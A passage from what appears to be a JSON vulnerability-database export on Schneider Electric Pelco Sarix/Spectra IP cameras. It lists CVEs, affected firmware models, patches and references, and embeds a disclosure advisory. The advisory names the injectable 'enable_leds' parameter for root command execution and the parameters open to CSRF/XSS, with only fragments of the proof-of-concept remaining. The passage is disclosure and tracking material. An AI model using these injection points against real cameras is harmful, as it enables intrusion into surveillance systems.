"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7236",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2018-058-01",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-05330",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053",
"trust": 0.6
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143314",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070076",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"id": "VAR-201803-1843",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
}
]
},
"last_update_date": "2023-12-18T12:18:59.308000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2018-058-01",
"trust": 0.8,
"url": "https://download.schneider-electric.com/files?p_endoctype=technical+leaflet\u0026p_file_id=9607912128\u0026p_file_name=sevd-2018-058-01+pelco+sarix+professional+v1.2.pdf\u0026p_doc_ref=sevd-2018-058-01"
},
{
"title": "SchneiderElectricPelcoSarixProfessional Unauthorized Patch for Operational Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/121577"
},
{
"title": "Schneider Electric Pelco Sarix Professional Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78847"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2018-058-01/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7236"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7236"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.3,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42308/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070076"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143314"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129666"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7828"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2018-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"date": "2018-04-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2018-03-09T23:29:00.810000",
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"date": "2018-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2018-03-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"date": "2018-04-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"date": "2022-02-02T02:08:51.777000",
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"date": "2022-02-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Pelco Sarix Professional Authentication vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
],
"trust": 0.6
}
}
VAR-201905-1049
Vulnerability from variot - Updated: 2023-12-18 12:18A Command Injection vulnerability exists in the web-based GUI of the 1st Gen PelcoSarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1049",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16261"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015518"
},
{
"db": "NVD",
"id": "CVE-2018-7825"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
